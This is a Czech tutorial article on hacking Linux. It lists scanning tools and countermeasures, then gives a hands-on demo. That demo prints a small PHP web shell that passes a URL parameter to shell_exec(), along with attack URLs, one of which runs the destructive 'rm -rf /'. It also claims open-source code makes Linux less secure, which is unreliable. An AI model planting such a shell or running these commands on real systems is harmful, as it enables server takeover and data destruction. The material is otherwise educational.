Hackování operačního systému Linux:

Linux je nejrozšířenější serverový operační systém, zejména pro webové servery. Je open source; to znamená, že kdokoli může mít přístup ke zdrojovému kódu. Proto je ve srovnání s jinými operačními systémy méně bezpečný, protože útočníci mohou studovat zdrojový kód a hledat v něm zranitelnosti. Linux pro hackery se zabývá využitím těchto zranitelností k získání neoprávněného přístupu do systému.

V tomto článku vás seznámíme s tím, co je Linux, s jeho bezpečnostními zranitelnostmi, s hackováním Ubuntu a s protiopatřeními, která můžete zavést.

Témata probíraná v tomto kurzu

  • Stručná poznámka k Linuxu
  • Nástroje pro hackování Linuxu
  • Jak zabránit hackování Linuxu
  • Hackerská činnost:

Stručná poznámka o Linuxu

Linux je operační systém s otevřeným zdrojovým kódem. Existuje mnoho distribucí operačních systémů založených na Linuxu, například Redhat, Fedora a Ubuntu atd. Na rozdíl od jiných operačních systémů je Linux méně bezpečný, pokud jde o zabezpečení. Je to proto, že jeho zdrojový kód je volně dostupný, takže je snadné studovat jeho zranitelnosti a zneužívat je ve srovnání s jinými operačními systémy, které nejsou open source. Linux lze používat jako operační systém pro servery, stolní počítače, tablety nebo mobilní zařízení.

Programy v Linuxu lze ovládat pomocí grafického uživatelského rozhraní nebo příkazů. Příkazy pro hackování systému Kali Linux jsou ve srovnání s použitím grafického uživatelského rozhraní efektivnější a účinnější. Z tohoto důvodu je užitečné znát základní linuxové příkazy pro hackování.

Podívejte se na tyto návody https://www.guru99.com/unix-linux-tutorial.html, jak začít s hackováním Kali Linuxu.

Nástroje pro hackování Linuxu

  • Nessus – tento nástroj lze použít pro hackování Ubuntu, skenování nastavení konfigurace, záplat a sítí atd. najdete ho na adrese https://www.tenable.com/products/nessus
  • NMap. Tento nástroj lze použít ke sledování hostitelů běžících na serveru a služeb, které využívají. Lze jej také použít ke skenování portů. Najdete jej na adrese https://nmap.org/
  • SARA – SARA je zkratka pro Security Auditor’s Research Assistant (Asistent pro výzkum bezpečnostního auditora). Jak název napovídá, tento nástroj lze použít k auditu sítí proti hrozbám, jako je SQL Injection, XSS atd. naleznete jej na adrese http://www-arc.com/sara/sara.html

Výše uvedený seznam není vyčerpávající; poskytuje vám představu o dostupných nástrojích pro hackování Ubuntu a systémů Linux.

Jak zabránit hackování Linuxu

Hackování Linuxu využívá zranitelnosti operačního systému. Organizace může přijmout následující zásady ochrany před takovými útoky.

  • Správa záplat – záplaty opravují chyby, které útočníci využívají ke kompromitaci systému. Dobrá politika správy záplat zajistí, že budete do systému neustále aplikovat příslušné záplaty.
  • Správná konfigurace operačního systému- další exploity využívají slabin v konfiguraci serveru. Neaktivní uživatelská jména a démoni by měli být zakázáni. Výchozí nastavení, jako jsou běžná hesla k aplikacím, výchozí uživatelská jména a některá čísla portů, by měla být změněna.
  • Systém detekce narušení- takové nástroje lze použít k odhalení neoprávněného přístupu do systému. Některé nástroje mají schopnost takové útoky odhalit a zabránit jim.

Hackerská činnost: V tomto praktickém scénáři se naučíme, jak hacknout systém Ubuntu, a poskytneme vám základní informace o tom, jak můžete pomocí jazyka PHP napadnout systém Linux

. Nebudeme se zaměřovat na žádnou oběť. Pokud si to chcete vyzkoušet, můžete si na svůj lokální počítač nainstalovat LAMPP.

PHP obsahuje dvě funkce, které lze použít k provádění příkazů pro hackování Linuxu. Má funkce exec() a shell_exec(). Funkce exec() vrací poslední řádek výstupu příkazu, zatímco funkce shell_exec() vrací celý výsledek příkazu jako řetězec.

Pro demonstrační účely předpokládejme, že útočníkovi manažeři nahrají na webový server následující soubor.

<?php$cmd = isset($_GET) ? $_GET : 'ls -l';echo "executing shell command:-> $cmd</br>";$output = shell_exec($cmd);echo "<pre>$output</pre>";?>

ZDE,

Výše uvedený skript získá příkaz z proměnné GET s názvem cmd. Příkaz se provede pomocí funkce shell_exec() a výsledek se vrátí do prohlížeče.

Výše uvedený kód lze zneužít pomocí následující adresy URL

http://localhost/cp/konsole.php?cmd=ls%20-l

ZDE,

  • „…konsole.php?cmd=ls%20-l „přiřadí proměnné cmd hodnotu ls -l.

Příkaz v Ubuntu pro hackování proti serveru se provede jako

shell_exec('ls -l') ;

Spuštění výše uvedeného kódu na webovém serveru dává podobné výsledky jako následující.

Výše uvedený příkaz jednoduše zobrazí soubory v aktuálním adresáři a práva

Předpokládejme, že útočník zadá následující příkaz

rm -rf /

ZDE,

  • „rm“ odstraní soubory
  • „rf“ způsobí, že se příkaz rm spustí v rekurzivním režimu. Odstranění všech složek a souborů
  • „/“ dává příkazu pokyn, aby začal odstraňovat soubory z kořenového adresáře

Adresa URL útoku by vypadala nějak takto

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Shrnutí

  • Linux je oblíbený operační systém pro servery, stolní počítače, tablety a mobilní zařízení.
  • Linux je otevřený zdrojový kód a zdrojový kód může získat kdokoli. Díky tomu je snadné odhalit zranitelnosti. Je to jeden z nejlepších operačních systémů pro hackery.
  • Základní a síťové hackerské příkazy v Ubuntu jsou pro linuxové hackery cenné.
  • Zranitelnosti jsou slabiny, které lze využít ke kompromitaci systému.
  • Dobré zabezpečení může pomoci ochránit systém před napadením útočníkem.

Napsat komentář

Vaše e-mailová adresa nebude zveřejněna.